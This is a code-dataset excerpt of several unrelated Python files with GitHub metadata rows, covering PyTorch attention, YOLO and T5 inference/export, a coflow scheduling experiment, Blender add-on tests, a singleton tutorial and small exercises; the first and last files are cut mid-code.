v_proj_weight_non_opt = torch.jit._unwrap_optional(v_proj_weight)
len1, len2 = v_proj_weight_non_opt.size()
assert len1 == embed_dim and len2 == value.size(-1)
if in_proj_bias is not None:
q = F.linear(query, q_proj_weight_non_opt, in_proj_bias[0:embed_dim])
k = F.linear(key, k_proj_weight_non_opt, in_proj_bias[embed_dim : (embed_dim * 2)])
v = F.linear(value, v_proj_weight_non_opt, in_proj_bias[(embed_dim * 2) :])
else:
q = F.linear(query, q_proj_weight_non_opt, in_proj_bias)
k = F.linear(key, k_proj_weight_non_opt, in_proj_bias)
v = F.linear(value, v_proj_weight_non_opt, in_proj_bias)
q = q * scaling
if attn_mask is not None:
assert (
attn_mask.dtype == torch.float32
or attn_mask.dtype == torch.float64
or attn_mask.dtype == torch.float16
or attn_mask.dtype == torch.uint8
or attn_mask.dtype == torch.bool
), "Only float, byte, and bool types are supported for attn_mask, not {}".format(attn_mask.dtype)
if attn_mask.dtype == torch.uint8:
warnings.warn("Byte tensor for attn_mask in nn.MultiheadAttention is deprecated. Use bool tensor instead.")
attn_mask = attn_mask.to(torch.bool)
if attn_mask.dim() == 2:
attn_mask = attn_mask.unsqueeze(0)
if list(attn_mask.size()) != [1, query.size(0), key.size(0)]:
raise RuntimeError("The size of the 2D attn_mask is not correct.")
elif attn_mask.dim() == 3:
if list(attn_mask.size()) != [bsz * num_heads, query.size(0), key.size(0)]:
raise RuntimeError("The size of the 3D attn_mask is not correct.")
else:
raise RuntimeError("attn_mask's dimension {} is not supported".format(attn_mask.dim()))
# attn_mask's dim is 3 now.
# convert ByteTensor key_padding_mask to bool
if key_padding_mask is not None and key_padding_mask.dtype == torch.uint8:
warnings.warn(
"Byte tensor for key_padding_mask in nn.MultiheadAttention is deprecated. Use bool tensor instead."
)
key_padding_mask = key_padding_mask.to(torch.bool)
if bias_k is not None and bias_v is not None:
if static_k is None and static_v is None:
k = torch.cat([k, bias_k.repeat(1, bsz, 1)])
v = torch.cat([v, bias_v.repeat(1, bsz, 1)])
if attn_mask is not None:
attn_mask = F.pad(attn_mask, (0, 1))
if key_padding_mask is not None:
key_padding_mask = F.pad(key_padding_mask, (0, 1))
else:
assert static_k is None, "bias cannot be added to static key."
assert static_v is None, "bias cannot be added to static value."
else:
assert bias_k is None
assert bias_v is None
q = q.contiguous().view(tgt_len, bsz * num_heads, head_dim).transpose(0, 1)
if k is not None:
k = k.contiguous().view(-1, bsz * num_heads, head_dim).transpose(0, 1)
if v is not None:
v = v.contiguous().view(-1, bsz * num_heads, head_dim).transpose(0, 1)
if static_k is not None:
assert static_k.size(0) == bsz * num_heads
assert static_k.size(2) == head_dim
k = static_k
if static_v is not None:
assert static_v.size(0) == bsz * num_heads
assert static_v.size(2) == head_dim
v = static_v
src_len = k.size(1)
if key_padding_mask is not None:
assert key_padding_mask.size(0) == bsz
assert key_padding_mask.size(1) == src_len
if add_zero_attn:
src_len += 1
k = torch.cat([k, torch.zeros((k.size(0), 1) + k.size()[2:], dtype=k.dtype, device=k.device)], dim=1)
v = torch.cat([v, torch.zeros((v.size(0), 1) + v.size()[2:], dtype=v.dtype, device=v.device)], dim=1)
if attn_mask is not None:
attn_mask = F.pad(attn_mask, (0, 1))
if key_padding_mask is not None:
key_padding_mask = F.pad(key_padding_mask, (0, 1))
attn_output_weights = torch.bmm(q, k.transpose(1, 2))
assert list(attn_output_weights.size()) == [bsz * num_heads, tgt_len, src_len]
if attn_mask is not None:
if attn_mask.dtype == torch.bool:
attn_output_weights.masked_fill_(attn_mask, float("-inf"))
else:
attn_output_weights += attn_mask
if key_padding_mask is not None:
attn_output_weights = attn_output_weights.view(bsz, num_heads, tgt_len, src_len)
attn_output_weights = attn_output_weights.masked_fill(
key_padding_mask.unsqueeze(1).unsqueeze(2),
float("-inf"),
)
attn_output_weights = attn_output_weights.view(bsz * num_heads, tgt_len, src_len)
attn_output_weights = F.softmax(attn_output_weights, dim=-1)
attn_output_weights = F.dropout(attn_output_weights, p=dropout_p, training=training)
attn_output = torch.bmm(attn_output_weights, v)
assert list(attn_output.size()) == [bsz * num_heads, tgt_len, head_dim]
attn_output = attn_output.transpose(0, 1).contiguous().view(tgt_len, bsz, embed_dim)
attn_output = F.linear(attn_output, out_proj_weight, out_proj_bias)
if need_weights:
attn_output_weights = attn_output_weights.view(bsz, num_heads, tgt_len, src_len)
return attn_output, attn_output_weights.mean(dim=1)
else:
return attn_output, None
| PJLab-ADG/SensorsCalibration | SensorX2car/camera2car/auto_calib/models/multi_head_attention.py | multi_head_attention.py | py | 15,197 | python | en | code | 1,730 | github-code | 90 |
5347916044 |
# 单例设计模式
class Singleton:
# 私有变量
__instance = None
__is_first = True
@classmethod
def __new__(cls,*args,**kwargs):
if cls.__instance is None:
cls.__instance = object.__new__(cls)
else:
pass
return cls.__instance
# init 这个方法将引用指向对应的内存空间
def __init__(self,a,b) -> None:
if self.__is_first:
self.a = a
self.b = b
self.__is_first = False
def __str__(self):
return "a is {} and b is {}".format(self.a,self.b)
# 定义一个类,记录通过这个类创建了多少个对象
class Person:
__count = 0
def __new__(cls,*args,**kwargs):
return object.__new__(cls)
def __init__(self,name,age) -> None:
Person.__count += 1
self.name = name
self.age = age
def __str__(self):
return "name is {} and age is {}".format(self.name,self.age)
@classmethod
def get_count(cls):
return cls.__count
if __name__ == "__main__":
p1 = Person("zhangsan",13)
p2 = Person("lisi",22)
print(p1)
print(p2)
p3 = object.__new__(Person)
# 不调用__init__为什么会报错呢
p3.__init__("wangwu",23)
print(p3)
print(Person.get_count())
s1 = Singleton(1,2)
s2 = Singleton(2,3)
print(s1 is s2)
print(s1)
print(s2)
pass
| zxm66/python | src/python_base/python_design_patten.py | python_design_patten.py | py | 1,421 | python | en | code | 0 | github-code | 90 |
23328685889 | import tensorflow as tf
import colorsys
import numpy as np
import os
from gymnoscamera.yolo_network.model import yolo_eval
from keras import backend as K
input_names = ['input_1']
output_names = ['conv2d_59/BiasAdd', 'conv2d_67/BiasAdd', 'conv2d_75/BiasAdd']
class Yolo_v3_rt:
_defaults = {
"model_path": None,
"anchors_path": 'model_data/yolo_anchors.txt',
"classes_path": 'model_data/coco_classes.txt',
"score": 0.3,
"iou": 0.45,
"model_image_size": (256, 256),
"gpu_num": 1,
}
def __init__(self):
self.__dict__.update(self._defaults) # set up default values
self.tf_sess = self.load_tf_rt_graph()
self.output_tensor = []
self.output_tensor.append(self.tf_sess.graph.get_tensor_by_name('conv2d_59/BiasAdd:0'))
self.output_tensor.append(self.tf_sess.graph.get_tensor_by_name('conv2d_67/BiasAdd:0'))
self.output_tensor.append(self.tf_sess.graph.get_tensor_by_name('conv2d_75/BiasAdd:0'))
self.input_tensor = self.tf_sess.graph.get_tensor_by_name('input_1:0')
self.class_names = self._get_class()
self.anchors = self._get_anchors()
self.boxes, self.scores, self.classes = self.generate()
def get_frozen_graph(self, graph_file):
"""Read Frozen Graph file from disk."""
with tf.gfile.FastGFile(graph_file, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
return graph_def
def load_tf_rt_graph(self):
tf.keras.backend.clear_session()
trt_graph = self.get_frozen_graph('./trt_graph.pb')
# Create session and load graph
tf_config = tf.ConfigProto()
tf_config.gpu_options.allow_growth = True
tf_sess = tf.Session(config=tf_config)
tf.import_graph_def(trt_graph, name='')
return tf_sess
def _get_class(self):
classes_path = os.path.expanduser(os.path.join(os.path.dirname(__file__), self.classes_path))
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def _get_anchors(self):
anchors_path = os.path.expanduser(os.path.join(os.path.dirname(__file__), self.anchors_path))
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def generate(self):
# Generate colors for drawing bounding boxes.
hsv_tuples = [(x / len(self.class_names), 1., 1.)
for x in range(len(self.class_names))]
self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
self.colors = list(
map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
self.colors))
np.random.seed(10101) # Fixed seed for consistent colors across runs.
np.random.shuffle(self.colors) # Shuffle colors to decorrelate adjacent classes.
np.random.seed(None) # Reset seed to default.
# Generate output tensor targets for filtered bounding boxes.
self.input_image_shape = K.placeholder(shape=(2,))
boxes, scores, classes = yolo_eval(self.output_tensor, self.anchors,
len(self.class_names), self.input_image_shape,
score_threshold=self.score, iou_threshold=self.iou)
return boxes, scores, classes
def detect_image(self, image):
image_data = np.array(image, dtype='float32')
(image_height, image_width, channels) = image_data.shape
image_data /= 255.
image_data = np.expand_dims(image_data, 0) # Add batch dimension.
out_boxes, out_scores, out_classes = self.tf_sess.run(
[self.boxes, self.scores, self.classes],
feed_dict={
self.input_tensor: image_data,
self.input_image_shape: [image_height, image_width],
})
print(out_boxes.shape)
list_of_coords = []
for i, c in reversed(list(enumerate(out_classes))):
predicted_class = self.class_names[c]
if predicted_class == "person":
box = out_boxes[i]
top, left, bottom, right = box
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(image_height, np.floor(bottom + 0.5).astype('int32'))
right = min(image_width, np.floor(right + 0.5).astype('int32'))
list_of_coords.append((left + i, top + i, right - i, bottom - i))
return list_of_coords
| Gymnos-AI/Gymnos-Camera | gymnoscamera/yolo_network_rt/yolo_v3_rt.py | yolo_v3_rt.py | py | 4,796 | python | en | code | 0 | github-code | 90 |
26884454320 | from persianmeme.translations import admin_messages
from persianmeme.models import User, MemeType
from persianmeme.classes import User as UserClass
def handler(text: str, user: UserClass):
if user.process_meme_tags(text):
user.database.menu = User.Menu.ADMIN_NEW_MEME
if user.database.temp_meme_type == MemeType.VOICE:
user.database.back_menu = 'voice_tags'
meme_translation = admin_messages['voice']
else:
user.database.back_menu = 'video_tags'
meme_translation = admin_messages['video']
user.send_message(user.translate('send_meme', meme_translation))
| Sholex-Team/LilSholex | persianmeme/handlers/message/menus/admin/menus/meme_tags.py | meme_tags.py | py | 640 | python | en | code | 38 | github-code | 90 |
38202887405 | import random
from pathlib import Path
from typing import List
import logging
import numpy
import torch
from transformers import T5Config
from onnxruntime import InferenceSession
logger = logging.getLogger(__name__)
class T5Encoder(torch.nn.Module):
""" T5 encoder outputs only the last hidden state"""
def __init__(self, encoder, config: T5Config):
super().__init__()
self.encoder = encoder
self.config = config
def forward(self, input_ids, attention_mask):
return self.encoder(input_ids, attention_mask)[0]
class T5EncoderInputs:
def __init__(self, input_ids, attention_mask):
self.input_ids: torch.LongTensor = input_ids
self.attention_mask: torch.LongTensor = attention_mask
@staticmethod
def create_dummy(batch_size: int, sequence_length: int, vocab_size: int,
device: torch.device): # -> T5EncoderInputs
""" Create dummy inputs for T5 encoder.
Args:
batch_size (int): batch size
sequence_length (int): sequence length
vocab_size (int): vocaburary size
device (torch.device): device of output tensors
Returns:
T5EncoderInputs: dummy inputs for encoder
"""
input_ids = torch.randint(low=0,
high=vocab_size - 1,
size=(batch_size, sequence_length),
dtype=torch.int64,
device=device)
attention_mask = torch.ones([batch_size, sequence_length], dtype=torch.int64, device=device)
if sequence_length >= 2:
for i in range(batch_size):
padding_position = random.randint(0, sequence_length - 1)
attention_mask[i, :padding_position] = 0
return T5EncoderInputs(input_ids, attention_mask)
def to_list(self) -> List:
input_list = [v for v in [self.input_ids, self.attention_mask] if v is not None]
return input_list
class T5EncoderHelper:
@staticmethod
def export_onnx(encoder: T5Encoder,
device: torch.device,
onnx_model_path: str,
verbose: bool = True,
use_external_data_format: bool = False):
"""Export encoder to ONNX
Args:
encoder (T5Encoder): encoder object
device (torch.device): device of encoder object
onnx_model_path (str): onnx path
verbose (bool, optional): print verbose information. Defaults to True.
use_external_data_format (bool, optional): use external data format or not. Defaults to False.
"""
config = encoder.config
encoder_inputs = T5EncoderInputs.create_dummy(batch_size=2,
sequence_length=4,
vocab_size=config.vocab_size,
device=device)
with torch.no_grad():
outputs = encoder(encoder_inputs.input_ids, encoder_inputs.attention_mask)
Path(onnx_model_path).parent.mkdir(parents=True, exist_ok=True)
torch.onnx.export(encoder,
args=tuple(encoder_inputs.to_list()),
f=onnx_model_path,
export_params=True,
input_names=['input_ids', 'attention_mask'],
output_names=['hidden_states'],
example_outputs=outputs,
dynamic_axes={
'input_ids': {
0: 'batch_size',
1: 'sequence_length'
},
'attention_mask': {
0: 'batch_size',
1: 'sequence_length'
},
'hidden_states': {
0: 'batch_size',
1: 'sequence_length'
},
},
opset_version=12,
do_constant_folding=True,
use_external_data_format=use_external_data_format,
verbose=verbose)
@staticmethod
def onnxruntime_inference(ort_session, inputs: T5EncoderInputs):
""" Run inference of ONNX model.
"""
ort_inputs = {
'input_ids': numpy.ascontiguousarray(inputs.input_ids.cpu().numpy()),
'attention_mask': numpy.ascontiguousarray(inputs.attention_mask.cpu().numpy())
}
return ort_session.run(None, ort_inputs)
@staticmethod
def verify_onnx(model: T5Encoder, ort_session: InferenceSession, device: torch.device):
""" Compare the result from PyTorch and OnnxRuntime to verify the ONNX model is good.
"""
inputs = T5EncoderInputs.create_dummy(batch_size=4,
sequence_length=11,
vocab_size=model.config.vocab_size,
device=device)
input_list = inputs.to_list()
torch_outputs = model(*input_list)
ort_outputs = T5EncoderHelper.onnxruntime_inference(ort_session, inputs)
max_diff = numpy.amax(numpy.abs(torch_outputs.cpu().numpy() - ort_outputs[0]))
logger.info(f'max_diff={max_diff}')
return max_diff
| fengbingchun/PyTorch_Test | src/onnxruntime/onnxruntime/python/tools/transformers/models/t5/t5_encoder.py | t5_encoder.py | py | 5,658 | python | en | code | 14 | github-code | 90 |
30619963015 | from gurobipy import *
from traceProducer.traceProducer import *
from traceProducer.jobClassDescription import *
from datastructures.jobCollection import *
from simulator.simulator import *
import numpy as np
import matplotlib.pyplot as plt
import time
instanceOfAlgo = ["FDLS", "Weaver"]
rawFDLS = []
rawWeaver = []
FDLS = []
Weaver = []
rseed = 13
turn = 100
listOfTurnsFDLS = []
average_FDLS = 0
listOfTurnsWeaver = []
average_Weaver = 0
while(turn > 0):
print(turn)
numRacks = 4
numJobs = 8
randomSeed = rseed
jobClassDescs = [JobClassDescription(1, 4, 1, 10),
JobClassDescription(1, 4, 10, 1000),
JobClassDescription(4, numRacks, 1, 10),
JobClassDescription(4, numRacks, 10, 1000)]
fracsOfClasses = [41,
29,
9,
21]
tr = CustomTraceProducer(numRacks, numJobs, jobClassDescs, fracsOfClasses, randomSeed)
tr.prepareTrace()
sim = Simulator(tr)
K = tr.getNumJobs()
N = tr.getNumRacks()
I = N
J = N
M = 10
d, flowlist = tr.produceFlowSizeAndList()
start = time.time()
# FDLS
loadI = np.zeros((M,I))
loadO = np.zeros((M,J))
A = [[] for h in range(M)]
flowlist.sort(key = lambda f: f[4])
for f in flowlist:
h_star = -1
minload = float("inf")
for h in range(M):
if loadI[h][f[1]] + loadO[h][f[2]] < minload:
h_star = h
minload = loadI[h][f[1]] + loadO[h][f[2]]
A[h_star].append([f[3], f[4]])
loadI[h_star][f[1]] += f[0]
loadO[h_star][f[2]] += f[0]
end = time.time()
executionTimeOfFDLS = end - start
print("========================================================")
print('execution time of FDLS: %f' % executionTimeOfFDLS)
print("========================================================")
listOfTurnsFDLS.append(executionTimeOfFDLS)
# Weaver
loadI = np.zeros((M,I))
loadO = np.zeros((M,J))
L = [0 for h in range(M)]
A = [[] for h in range(M)]
flowlist.sort(key = lambda f: f[0], reverse = True)
for f in flowlist:
h_star = -1
minload = float("inf")
flag = -1
for h in range(M):
if loadI[h][f[1]]+f[0] > L[h]:
flag = 1
if loadO[h][f[2]]+f[0] > L[h]:
flag = 1
if flag == 1:
for h in range(M):
maxload = max(max(loadI[h][f[1]]+f[0], loadO[h][f[2]]+f[0]), L[h])
if maxload < minload:
h_star = h
minload = maxload
if h_star == -1:
minload = float("inf")
for h in range(M):
loadI[h][f[1]] += f[0]
loadO[h][f[2]] += f[0]
maxload = max(loadI[h][f[1]], loadO[h][f[2]])
loadI[h][f[1]] -= f[0]
loadO[h][f[2]] -= f[0]
if maxload < minload:
h_star = h
minload = maxload
A[h_star].append(f[3])
loadI[h_star][f[1]] += f[0]
loadO[h_star][f[2]] += f[0]
if loadI[h_star][f[1]] > L[h_star]:
L[h_star] = loadI[h_star][f[1]]
if loadO[h_star][f[2]] > L[h_star]:
L[h_star] = loadO[h_star][f[2]]
end = time.time()
executionTimeOfWeaver = end - start
print("========================================================")
print('execution time of Weaver: %f' % executionTimeOfWeaver)
print("========================================================")
listOfTurnsWeaver.append(executionTimeOfWeaver)
rseed += 1
turn -= 1
for f in listOfTurnsFDLS:
average_FDLS += f
average_FDLS /= len(listOfTurnsFDLS)
FDLS.append(average_FDLS)
rawFDLS.append(listOfTurnsFDLS)
for w in listOfTurnsWeaver:
average_Weaver += w
average_Weaver /= len(listOfTurnsWeaver)
Weaver.append(average_Weaver)
rawWeaver.append(listOfTurnsWeaver)
raw = {'rawFDLS': rawFDLS, 'rawWeaver': rawWeaver}
algo = {'FDLS': FDLS, 'Weaver': Weaver}
file = open('../result/custom_divisible_time_complexity/custom_divisible_time_complexity.txt','w')
for key, values in raw.items():
file.write(key + ' ' + str(len(values)))
for value in values:
file.write(' ' + str(len(value)))
for v in value:
file.write(' ' + str(v))
file.write('\n')
for key, values in algo.items():
file.write(key + ' ' + str(len(values)))
for value in values:
file.write(' ' + str(value))
file.write('\n')
file.close()
# 設定圖片大小為長15、寬10
plt.figure(figsize=(15,10),dpi=100,linewidth = 2)
x = np.arange(len(instanceOfAlgo))
width = 0.3
plt.bar(x[0],FDLS,width,color = 'g', label="FDLS")
plt.bar(x[1],Weaver,width,color = 'b', label="Weaver")
# 設定圖片標題,以及指定字型設定,x代表與圖案最左側的距離,y代表與圖片的距離
plt.title("Divisible coflows from custom", size=40, x=0.5, y=1.03)
# 設置刻度字體大小
plt.xticks(x,instanceOfAlgo,fontsize=20)
plt.yticks(fontsize=20)
# 標示x軸(labelpad代表與圖片的距離)
plt.xlabel("Algorithms", fontsize=30, labelpad = 15)
# 標示y軸(labelpad代表與圖片的距離)
plt.ylabel("Execution time (s)", fontsize=30, labelpad = 20)
# 顯示出線條標記位置
plt.legend(loc = "best", fontsize=20)
# 畫出圖片
plt.show() | Joe0047/Teacher-experiments | Experiments/coflowSim/main_custom_divisible_time_complexity.py | main_custom_divisible_time_complexity.py | py | 5,665 | python | en | code | 0 | github-code | 90 |
9901717670 | # -*- coding: utf-8 -*-
import time
from PyQt5.QtCore import QThread, pyqtSignal
from crawler.controller import Controller
class Worker(QThread):
fetch_finished = pyqtSignal(dict)
def __init__(self, parent, uid, upw):
super().__init__(parent)
self.parent = parent
self.isRunning = False
self.init = True
self.controller = Controller(uid, upw)
def run(self):
self.isRunning = True
self.parent.titleButton.setText("사자가 열심히 정글을 뒤지고 있어요..!")
if self.init:
self.init = False
self.fetch_finished.emit(self.controller.get_course_info())
data = self.controller.get_all_assignments()
self.fetch_finished.emit(data)
self.parent.titleButton.setText("밀림의 왕")
self.isRunning = False
| bo-lim/Class_Scheduler | worker.py | worker.py | py | 850 | python | en | code | 0 | github-code | 90 |
416925619 | from pathlib import Path
import unittest
import bpy
from mixer.blender_data.bpy_data_proxy import BpyDataProxy
from mixer.blender_data.datablock_proxy import DatablockProxy
from mixer.blender_data.diff import BpyBlendDiff
from mixer.blender_data.filter import test_properties
class DifferentialApply(unittest.TestCase):
def setUp(self):
this_folder = Path(__file__).parent
test_blend_file = str(this_folder / "empty.blend")
file = test_blend_file
bpy.ops.wm.open_mainfile(filepath=file)
self.proxy = BpyDataProxy()
self.proxy.load(test_properties)
self.scene_proxy: DatablockProxy = self.proxy.data("scenes").search_one("Scene")
self.scene = bpy.data.scenes["Scene"]
self.scenes_property = bpy.data.bl_rna.properties["scenes"]
def generate_all_uuids(self):
# as a side effect, BpyBlendDiff generates the uuids
_ = BpyBlendDiff()
_.diff(self.proxy, test_properties)
class Datablock(DifferentialApply):
def test_builtin(self):
# a python builtin in a dataclock
# Scene.audio_volume
# test_diff_apply.Datablock.test_builtin
self.scene.audio_volume = 0.5
delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
# the diff has audio_volume, updated to 0.5
# rollback to anything else
self.scene.audio_volume = 0.0
# apply the diff
scene = bpy.data.scenes[self.scene.name]
self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, delta, self.proxy.context())
self.assertEqual(self.scene.audio_volume, 0.5)
def test_struct_builtin(self):
# a python builtin a a struct inside a datablock
# Scene.eevee.use_bloom
# test_diff_apply.Datablock.test_struct_builtin
self.scene.eevee.use_bloom = False
self.proxy = BpyDataProxy()
self.proxy.load(test_properties)
self.scene_proxy: DatablockProxy = self.proxy.data("scenes").search_one("Scene")
self.scene.eevee.use_bloom = True
delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
# diff is -> True
# reset
self.scene.eevee.use_bloom = False
# apply the diff
scene = bpy.data.scenes[self.scene.name]
self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, delta, self.proxy.context())
self.assertEqual(self.scene.eevee.use_bloom, True)
class StructDatablockRef(DifferentialApply):
# datablock reference in a struct
# Scene.world
def test_add(self):
# set reference from None to a valid datablock
# test_diff_apply.StructDatablockRef.test_add
# create first so that is is correctly registered (bpt_data.diff would register it, not scene_proxy.diff)
world = bpy.data.worlds.new("W")
self.scene.world = None
self.proxy = BpyDataProxy()
self.proxy.load(test_properties)
# Loaded proxy contains scene.world = None
self.scene_proxy: DatablockProxy = self.proxy.data("scenes").search_one("Scene")
self.scene.world = world
self.generate_all_uuids()
delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
# Diff contains set scene.proxy to world
self.scene.world = None
# apply the diff
scene = bpy.data.scenes[self.scene.name]
self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, delta, self.proxy.context())
self.assertEqual(self.scene.world, world)
def test_update(self):
# set reference from None to a valid datablock
# test_diff_apply.StructDatablockRef.test_update
world1 = bpy.data.worlds.new("W1")
world2 = bpy.data.worlds.new("W2")
self.scene.world = world1
self.proxy = BpyDataProxy()
self.proxy.load(test_properties)
self.scene_proxy: DatablockProxy = self.proxy.data("scenes").search_one("Scene")
self.scene.world = world2
self.generate_all_uuids()
delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
# diff -> world2
# reset
self.scene.world = world1
# apply the diff
scene = bpy.data.scenes[self.scene.name]
self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, delta, self.proxy.context())
self.assertEqual(self.scene.world, world2)
def test_remove(self):
# apply sets reference from a valid datablock to None
# test_diff_apply.StructDatablockRef.test_remove
world = bpy.data.worlds.new("W")
self.scene.world = world
self.proxy = BpyDataProxy()
self.proxy.load(test_properties)
# Loaded proxy contains scene.world = world
self.scene_proxy: DatablockProxy = self.proxy.data("scenes").search_one("Scene")
self.scene.world = None
self.generate_all_uuids()
delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
# Delta contains set scene.proxy to none
self.scene.world = world
# apply the diff
scene = bpy.data.scenes[self.scene.name]
self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, delta, self.proxy.context())
self.assertEqual(self.scene.world, None)
class Collection(DifferentialApply):
# test_differential.Collection
def test_datablock_collection(self):
# Scene.collection.objects
# A collection of references to standalone datablocks
# tests DatablockCollectionProxy.apply()
# test_diff_apply.Collection.test_datablock_collection
for i in range(2):
empty = bpy.data.objects.new(f"Unchanged{i}", None)
self.scene.collection.objects.link(empty)
for i in range(2):
empty = bpy.data.objects.new(f"Deleted{i}", None)
self.scene.collection.objects.link(empty)
self.proxy = BpyDataProxy()
self.proxy.load(test_properties)
self.scene_proxy = self.proxy.data("scenes").search_one("Scene")
self.scene = bpy.data.scenes["Scene"]
for i in range(2):
empty = bpy.data.objects.new(f"Added{i}", None)
self.scene.collection.objects.link(empty)
for i in range(2):
empty = bpy.data.objects[f"Deleted{i}"]
self.scene.collection.objects.unlink(empty)
self.generate_all_uuids()
scene_delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
# delta contains(deleted1, deleted 2, added1, added2)
# reset
for i in range(2):
empty = bpy.data.objects[f"Deleted{i}"]
self.scene.collection.objects.link(empty)
for i in range(2):
empty = bpy.data.objects[f"Added{i}"]
self.scene.collection.objects.unlink(empty)
# required because the Added{i} were created after proxy load and are not known by the proxy
# at this time. IRL the depsgraph handler uses BpyBendDiff to find datablock additions,
# then BpyDataProxy.update()
self.proxy.load(test_properties)
scene = bpy.data.scenes[self.scene.name]
self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, scene_delta, self.proxy.context())
self.assertIn("Unchanged0", self.scene.collection.objects)
self.assertIn("Unchanged1", self.scene.collection.objects)
self.assertIn("Added0", self.scene.collection.objects)
self.assertIn("Added1", self.scene.collection.objects)
self.assertNotIn("Deleted0", self.scene.collection.objects)
self.assertNotIn("Deleted1", self.scene.collection.objects)
def test_key_str(self):
# Scene.render.views
# A bpy_prop_collection with string keys
# tests StructCollectionProxy.apply()
# test_diff_apply.Collection.test_key_str
self.proxy = BpyDataProxy()
self.proxy.load(test_properties)
self.scene_proxy = self.proxy.data("scenes").search_one("Scene")
self.scene = bpy.data.scenes["Scene"]
view_right = self.scene.render.views["right"]
self.scene.render.views.remove(view_right)
view = self.scene.render.views.new("New")
view = self.scene.render.views["left"]
view_left_suffix_bak = view.file_suffix
view.file_suffix = "new_suffix"
self.generate_all_uuids()
scene_delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
# reset to initial state
views = bpy.data.scenes["Scene"].render.views
view_right = views.new("right")
views["left"].file_suffix = view_left_suffix_bak
view_new = views["New"]
views.remove(view_new)
scene = bpy.data.scenes[self.scene.name]
self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, scene_delta, self.proxy.context())
self.assertIn("New", views)
self.assertIn("left", views)
self.assertEqual(views["left"].file_suffix, "new_suffix")
self.assertNotIn("right", views)
@unittest.skip("Not implemented: addition in array")
def test_key_int(self):
# Scene.view_settings.curve_mapping.curves
# A bpy_prop_collection with string keys
# test_diff_apply.Collection.test_key_int
self.scene.view_settings.use_curve_mapping = True
points0 = self.scene.view_settings.curve_mapping.curves[0].points
points0.new(0.5, 0.5)
points1 = self.scene.view_settings.curve_mapping.curves[1].points
self.proxy = BpyDataProxy()
self.proxy.load(test_properties)
self.scene_proxy = self.proxy.data("scenes").search_one("Scene")
self.scene = bpy.data.scenes["Scene"]
points0.remove(points0[1])
points1.new(2.0, 2.0)
self.generate_all_uuids()
scene_delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
# the delta contains :
# curves[0]: Deletion of element 1
# curves[1]: Addition of element 2
# reset state
points0.new(0.5, 0.5)
points1.remove(points1[2])
scene = bpy.data.scenes[self.scene.name]
self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, scene_delta, self.proxy.context())
self.assertEqual(len(points0), 2)
self.assertEqual(list(points0[0].location), [0.0, 0.0])
self.assertEqual(list(points0[1].location), [1.0, 1.0])
self.assertEqual(len(points1), 3)
self.assertEqual(list(points1[0].location), [0.0, 0.0])
self.assertEqual(list(points1[1].location), [1.0, 1.0])
self.assertEqual(list(points1[2].location), [2.0, 2.0])
class Aos(DifferentialApply):
# test_diff_compute.Aos
# @unittest.skip("AttributeError: 'CollectionObjects' object has no attribute 'fixed_type'")
def test_modify_value(self):
# modify a vertex coordinate in a mesh
# test_diff_apply.Aos.test_modify_value
mesh = bpy.data.meshes.new("Mesh")
mesh.vertices.add(4)
for i in [0, 1, 2, 3]:
v = 10 * i
mesh.vertices[i].co = [v, v + 1, v + 2]
expected_vertices = [list(vertex.co) for vertex in mesh.vertices]
self.proxy = BpyDataProxy()
self.proxy.load(test_properties)
mesh_proxy = self.proxy.data("meshes").search_one("Mesh")
mesh = bpy.data.meshes["Mesh"]
modified_vertex = (-1.0, -2.0, -3.0)
mesh.vertices[0].co = modified_vertex
self.generate_all_uuids()
mesh_delta = mesh_proxy.diff(mesh, mesh.name, None, self.proxy.context())
# reset mesh state
mesh.vertices[0].co = (0.0, 1.0, 2.0)
mesh_proxy.apply(bpy.data.meshes[mesh.name], bpy.data.meshes, mesh.name, mesh_delta, self.proxy.context())
vertices = [list(vertex.co) for vertex in mesh.vertices]
self.assertEqual(vertices, expected_vertices)
| ubisoft/mixer | mixer/blender_data/tests/test_diff_apply.py | test_diff_apply.py | py | 12,254 | python | en | code | 1,311 | github-code | 90 |
18511240209 | from pprint import pprint
def main():
D,G = map(int, input().split())
p,c = [0]*D,[0]*D
for i in range(D):
p[i],c[i] = map(int, input().split())
qnum = sum(p)
# dp[i][j] := i問目まででj個解いたときの最大得点
dp = [[0]*(qnum+1) for _ in range(D+1)]
dp[0] = [0]*(qnum+1)
ans = qnum
for i in range(1,D+1):
# i問目までを見る
for j in range(qnum+1):
# 全部でj回解く
for k in range(min(p[i-1]+1, j+1)):
# i問目をk個解く
if k<p[i-1]:
dp[i][j] = max(dp[i][j], dp[i-1][j-k]+100*i*k)
else:
dp[i][j] = max(dp[i][j], dp[i-1][j-k]+100*i*k+c[i-1])
if dp[i][j]>=G:
ans = min(ans, j)
pprint(ans)
main()
| Aasthaengg/IBMdataset | Python_codes/p03290/s924866554.py | s924866554.py | py | 835 | python | en | code | 0 | github-code | 90 |
39762692126 | import random
def humanguess():
number=random.randrange(0,10)
print(number)
respuesta=int(input("Dame un numero del 0 al 10: "))
while number != respuesta:
respuesta=int(input("Dame un numero del 0 al 10: "))
if number==respuesta:
